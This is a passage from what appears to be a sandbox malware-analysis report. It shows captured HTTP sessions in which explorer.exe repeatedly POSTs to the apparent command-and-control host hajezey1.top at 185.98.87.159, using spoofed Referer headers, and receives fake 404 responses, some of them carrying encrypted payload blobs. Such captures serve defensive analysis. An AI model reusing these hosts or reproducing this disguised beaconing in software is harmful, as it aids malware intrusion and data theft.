                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 140
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:40.783237934 CEST7472INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:40 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 52 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b c3 a7 86 38 b4 f2 a7 7c 2d f0 3a cb 8f 8c f5 cf 9b 2b 25 9b 16 ba eb 1b bb 1d 57 74 d2 eb 98 87 cd 23 80 78 51 a1 a2 8f d2 ee df 1c e0 12 02 50 08 08 d8 e2 30 a5 19 93 9b 97 4f f3 e0 e4 62 79 00 54 ea d6 d7 0c 3d 61 19 27 f4 d2 af 34 91 b4 b9 c1 82 20 59 57 11 5c 7c 3b 66 ab 4b 11 c0 4d 58 4b 77 13 d2 08 5b 47 86 65 29 15 32 39 c5 f7 45 22 aa cf 7c c1 7f 9f fc b7 a8 9f 96 98 8b 36 19 19 cb 8a f3 d8 05 0f 4e 86 19 7d 6f ab e1 04 89 63 7a 55 80 90 70 89 7f c8 4a 6b b6 e2 a2 22 48 42 d3 49 ad ff fc ff 1f ed f5 3f f4 6d d3 7c ce 36 d3 ce 4e 49 b3 0b 5e 4c 64 55 5b ad 30 7a 83 9b 84 c8 c3 e7 b2 ec 1c e1 0c 1c 55 ee 87 fe 0c 35 9a 3d 50 6f d0 56 81 96 8b 97 9e 60 9f 8a 86 e8 47 5a bd b2 cb 99 64 51 11 87 4a b1 b8 56 ec ef f7 0a 83 8b 71 91 e0 75 7e 64 19 a0 77 79 27 24 58 96 da 39 d1 3a 2d a6 43 06 02 27 47 c2 fa 6b 8a b2 e2 4b 6d ec 00 31 a5 e2 ec d7 d9 e6 60 f7 f8 23 d3 3e 5b f3 71 81 4a 04 38 2d 7f 14 2c d6 e8 b1 14 73 71 10 fa 82 4b 86 07 30 5a 22 a2 3f 0b 8e 2b 51 fd f5 7a 00 9d 82 ef d0 d6 4a 13 a7 e9 4d 51 c2 41 64 cd 27 5c 8d b7 a3 23 0c 26 17 51 d2 eb e9 23 19 b3 32 59 08 42 41 ae e4 36 dd 3f 9d 43 cd 17 fe 2f 15 9f f8 d8 66 47 42 25 e1 b5 be 34 56 9b 46 3e 99 86 11 22 83 37 22 ec 68 aa cf 04 2a 95 36 56 0f 50 67 74 20 b9 87 f6 f4 81 de bb 34 6b 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ac f8 b9 1f 3a 48 93 92 4e bd 44 ef fb c9 e3 de ea 50 38 02 97 b1 a4 57 25 57 b9 d0 ea 85 62 4a 08 7d 54 7a 98 6c 39 c0 1e f3 5c d9 40 00 fc ce 6e 47 b3 9a 4c 07 22 7d e6 a2 c6 62 b9 14 31 eb cd 40 24 15 8e b7 82 7f 8e 40 b6 f1 b8 4e a1 21 3b 88 4b 6e 47 f3 04 dd be c6 83 41 5f 4f af b8 e8 01 be a2 57 ee 60 87 bd b7 6b 67 09 0f 8a ef 22 3b 6b 81 c7 86 7a 8e 12 d3 e4 de 0e 7b d6 7d 00 2c 0f 7a d7 9b 48 0b ad 8b bc 08 85 f7 8f 82 42 b7 28 85 d8 da 14 79 a2 8e b9 08 c0 fe 77 c6 1d 2b 15 bf fa a5 e9 a8 b2 13 3b 35 02 1a 1b eb c2 f5 6c 8d e3 17 d3 83 6f ce ed 3f ec cf 81 68 73 02 99 ea a6 f5 c3 05 d0 b3 d3 23 39 41 c4 a5 c8 63 77 ca 0b 8f bd d9 39 6b a1 99 98 77 e8 0f 4e 8c da 06 bd 37 87 8c b4 26 b8 2c 58 b2 77 6c 08 d8 f9 d2 eb 48 25 66 34 2d 6f 77 5e a5 37 48 84 99 ff 67 37 f9 ad a1 97 3b 86 f3 bd 98 bb 1f 67 c7 26 e1 39 c6 86 8e f0 09 af 63 95 09 09 a8 1f 13 30 7b 32 cc c9 e1 ad c3 e5 0f 25 93 23 c4 1d d7 cf 8e 34 39 dc 46 77 58 dc be 91 98 3f d8 2c eb 53 43 a0 0c 97 e4 22 76 f9 14 f9 0b 64 82 93 64 4f 55 b4 ca 5e c3 d5 c0 88 0b 3d d9 1d 69 09 de ff 3d c1 03 70 2e 6f f4 d4 6a db a9 16 da 07 22 bd c8 ac cf 3f ef ba a9 a6 cc b4 02 47 71 f5 66 3c 3d d8 bf cb 67 5c d8 97 24 c8 b9 fc f0 d4 e8 57 2d a6 a1 11 19 c0 7b 69 ad 06 5b 80 1c b7 36 db 64 73 82 f5 51 cf 3b c5 da 87 f1 7d 87 70 f3 35 43 50 11 00 ac 27 1d 02 a1 97 28 e4 f0 9e 11 41 a6 ca 87 35 ce 39 c3 ce 85 56 3b 38 a6 15 e4 c6 ce a9 22 27 90 32 fb 10 df b7 b7 c8 10 46 15 b1 97 4c c3 f9 8c e2 58 e9 9c b7 3d ef ce 38 1f c1 19 39 ec a8 01 8f 44 ea 9b bf 6e c0 53 5b 76 cb c4 bd 8f 46 84 7f 9c b8 6a f7 5b 61 67 85 1a aa 50 f1 33 0d 4d 9e 1f ed 23 97 05 42 e0 c9 1c 9c 4a be 99 95 43 d2 7c 6c b8 4f 4e 7d bb ad 45 43 37 86 96 3f d8 a1 f7 94 8f c9 3b cb 53 94 6d 9b 3d 70 e0 53 08 55 42 da 49 3b b1 85 2c 03 39
                                                            Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/arR`g1Q5ih.Kw:i/+".]pW!RY8|-:+%Wt#xQP0ObyT=a'4 YW\|;fKMXKw[Ge)29E"|6N}oczUpJk"HBI?m|6NI^LdU[0zU5=PoV`GZdQJVqu~dwy'$X9:-C'GkKm1`#>[qJ8-,sqK0Z"?+QzJMQAd'\#&Q#2YBA6?C/fGB%4VF>"7"h*6VPgt 4k6'NGc:HNDP8W%WbJ}Tzl9\@nGL"}b1@$@N!;KnGA_OW`kg";kz{},zHB(yw+;5lo?hs#9Acw9kwN7&,XwlH%f4-ow^7Hg7;g&9c0{2%#49FwX?,SC"vddOU^=i=p.oj"?Gqf<=g\$W-{i[6dsQ;}p5CP'(A59V;8"'2FLX=89DnS[vFj[agP3M#BJC|lON}EC7?;Sm=pSUBI;,9


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            21192.168.2.549809185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:44.645313978 CEST8112OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://adqaqqqe.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 306
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:44.731095076 CEST8113INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:44 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            22192.168.2.549810185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:44.824063063 CEST8114OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://bjcvackirk.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 113
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:44.902698040 CEST8114INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:44 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            23192.168.2.549811185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:44.995501041 CEST8115OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://lylgknghko.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 302
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:45.077245951 CEST8117INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:45 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 66 36 36 0d 0a 00 00 d2 a7 53 28 ca 53 57 5c 2f 8f 69 c1 50 22 ec 26 d8 a1 e7 26 67 0b 72 90 86 ec d2 ca 71 c4 7c be 02 d7 36 3f f4 65 91 89 49 80 4a 35 7e dc 99 bc 2f 8d 61 e9 72 e6 ce 17 b5 12 df 9c 22 60 1b d6 88 67 a1 c2 8a 31 51 0f 88 35 69 d1 88 86 a9 68 1b 1c 2e 4b 08 84 f3 77 b3 f6 12 94 b5 d4 02 cc 3a d8 c8 69 2f 2b ba 22 2e c0 90 88 e0 5d 98 70 16 d6 08 e3 57 da d8 ed 21 e5 e1 94 52 ea 59 9b 93 e2 86 38 f8 f3 a4 7c 7f e2 46 aa 8f 8c f5 cf 9b 2b 25 9b f6 ba c9 1b b0 1c 67 74 d2 ff 95 87 cd 2b 80 78 51 a1 a2 8f 2c df d2 1c e0 32 02 50 08 08 d8 e2 30 a5 59 93 9b b7 4f f3 e0 e6 62 79 04 54 ea d6 d7 0c 3d 61 1f 27 f4 d2 af 34 91 b4 b9 41 8f 20 59 55 11 5c 7c 3b 66 ab 49 11 a0 c8 58 4b 67 13 d2 18 5b 47 86 65 39 15 32 29 c5 f7 15 67 aa cf 20 c0 7a 9f 06 a2 7f c1 96 98 8b 36 bd 28 c6 8a 44 d8 06 0e 45 c7 1e 7d 6f fb e0 04 89 f9 d4 57 80 90 70 89 ec e4 4a 6b b6 f2 a2 22 48 52 df 49 a1 ff bc ff 1f fd f5 3f f4 6f d3 7c cb 36 d2 ce 4e 49 b3 0b 5b 4c 65 55 5b ad 30 7a 83 3b 2b ca c3 e3 b2 ec 92 90 0f 1c 57 ee 87 7e 0c 35 8a 3d 50 7f d0 56 81 b6 9b 97 96 70 9f 8a 86 e8 47 5a ad b2 cb 99 6c 71 11 87 02 b1 b8 56 b0 40 f6 0a bf 8b 71 91 ce 21 b5 1e 55 df 76 79 23 36 55 96 da 19 d1 3a 2d b2 4e 06 02 25 47 c2 fa 6b 8a b2 e2 4b 6d ec c0 40 a4 e2 d0 d7 d9 86 4e 85 8b 51 b0 3e 5b f3 71 87 4a 04 38 6d 72 14 2c d0 e8 b1 14 65 7c 10 22 17 4a 86 47 30 5a 22 a2 3f 0b 8e 6b 51 fd b5 54 02 f9 ee f8 b2 d6 4a 1f a7 e9 4d 51 a2 4c 64 cd 25 5c 8d b7 bf 2e 0c 26 17 51 d2 eb e9 23 19 9d 46 3c 70 76 41 ae a6 c3 88 3e 9d 43 dd 17 fe 2f 43 9e f8 d8 62 47 42 c5 d0 b8 be 34 56 9b 46 76 99 86 11 00 83 32 42 52 f7 c2 ae 64 0f 95 36 e1 48 52 67 25 50 b8 81 f6 bc 81 de bb 6e 6a 36 cf 09 27 4e e2 d2 be 95 47 ab 63 10 ec f8 b9 5f 14 2c f2 e6 2f bd 44 ef bf 8b 4f dc ea 90 39 02 97 ab a4 57 25 f5 b8 d0 bc a6 62 4a 08 5d f6 b3 06 2d 1a c0 5e f3 7c bb a7 fd d4 98 21 17 da 9a 2d 35 23 7d f5 b2 68 60 b8 10 31 fa ed ad 67 e1 e1 bd 84 f3 8c 40 b6 f0 90 4f a1 21 71 ae 61 2e 7a b1 76 af ce c6 83 41 66 30 ae a9 c8 d0 7e 33 3a 64 67 0b bf 77 6a 66 21 0e 8a ef 28 1d 41 81 d4 b6 78 8e 18 d3 e4 9e 0c 7b d6 6c 02 2f 27 76 d7 9b 4e 20 ba f5 be 08 85 fd 89 aa 41 b7 28 8f f4 d5 06 78 5c 9b b8 08 c0 e5 5c c5 17 00 f3 b8 d0 a3 39 a9 b2 13 20 1d 06 1a 1b e1 ea f0 6c 8d e9 c7 d2 83 6f d5 c5 3b ec cf 8b 40 75 02 99 e0 03 f4 c3 05 cb 99 d3 23 2a 71 c7 a5 d9 62 77 ca 08 8f bd c8 11 61 a1 99 9e 5f e3 0f 4e 8a d0 23 9d 43 8e 7e 14 0e b9 2c 58 99 f7 6d 08 d8 fd f7 cb ab 42 66 fb 05 6d 77 5e 8e b7 4a 84 99 fb 42 17 7d bd 91 94 13 85 f3 bd b3 3b 1c 67 c7 22 e7 19 8e 53 c0 b2 21 ab 63 95 22 89 ac 1f 13 34 5e 12 59 b3 52 34 eb e0 0f 25 b8 a3 c1 1d d7 cb ab 14 62 f3 3b 1f 70 da be 91 b3 bf de 2c eb 57 66 80 fe 9d 11 b0 5e fe 14 f9 20 e4 89 93 64 4b 70 94 ea 13 6b e6 e8 80 0b 3d f2 9d 65 09 de fb 18 e1 98 ea 30 e3 dc dd 6a db 82 96 dd 07 22 b9 ed 8c 54 a5 f1 36 81 ac cc b4 29 c7 79 f5 66 38 18 f8 e0 c0 24 b2 f0 9c 24 c8 92 7c f9 d4 e8 53 08 86 52 e4 3f a4 53 65 ad 06 70 00 16 b7 36 df 44 f1 22 74 2c e7 36 c5 da ac da 5f 81 50 ec 3e b9 72 39 0e ac 27 36 82 af 97 28 e0 f6 be e6 a7 e2 84 af 3a ce 39 e8 4e 95 91 3a 90 ff 53 64 22 62 a2 26 0c 11 bf 2a 5c a7 ef c6 a1 00 ae 8b 91 17 5d 35 bd ac c0 59 9d 9b f2 e5 fe de 54 1e 98 92 fb b2 6a 14 9d 84 32 c7 37 6f 03 70 51 8d c8 81 99 8b fa 81 7f 1d bc 6c c2 ca a5 a4 d0 9b 38 ea 81 2f 07 5b 6c 7e 96 23 97 84 79 ea 9a 4a 1d 68 8c 50 16 11 28 a0 81 bc 73 9d 7d bb fa c8 16 31 e5 a8 6f 20 c9 09 e4 ce cd 6b 90 46 97 fe da 39 9d f6 c1 6d 06 42 7b fb fa f3 a5 9a 46 e4
                                                            Data Ascii: 1f66S(SW\/iP"&&grq|6?eIJ5~/ar"`g1Q5ih.Kw:i/+".]pW!RY8|F+%gt+xQ,2P0YObyT=a'4A YU\|;fIXKg[Ge92)g z6(DE}oWpJk"HRI?o|6NI[LeU[0z;+W~5=PVpGZlqV@q!Uvy#6U:-N%GkKm@NQ>[qJ8mr,e|"JG0Z"?kQTJMQLd%\.&Q#F<pvA>C/CbGB4VFv2BRd6HRg%Pnj6'NGc_,/DO9W%bJ]-^|!-5#}h`1g@O!qa.zvAf0~3:dgwjf!(Ax{l/'vN A(x\\9 lo;@u#*qbwa_N#C~,XmBfmw^JB};g"S!c"4^YR4%b;p,Wf^ dKpk=e0j"T6)yf8$$|SR?Sep6D"t,6_P>r9'6(:9N:Sd"b&*\]5YTj27opQl8/[l~#yJhP(s}1o kF9mB{F


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            24192.168.2.549812185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:48.275233984 CEST9009OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://wexymhl.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 156
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:48.358205080 CEST9010INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:48 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            25192.168.2.549813185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:48.492503881 CEST9011OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://glqydpsa.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 217
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:48.570226908 CEST9011INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:48 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            26192.168.2.549814185.98.87.15980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 29, 2021 20:10:48.655894041 CEST9013OUTPOST / HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://kqbwtkcju.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 120
                                                            Host: hajezey1.top
                                                            Oct 29, 2021 20:10:48.736651897 CEST9050INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.20.1
                                                            Date: Fri, 29 Oct 2021 18:10:48 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Data Raw: 31 39 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 61 6a 65 7a 65 79 31 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 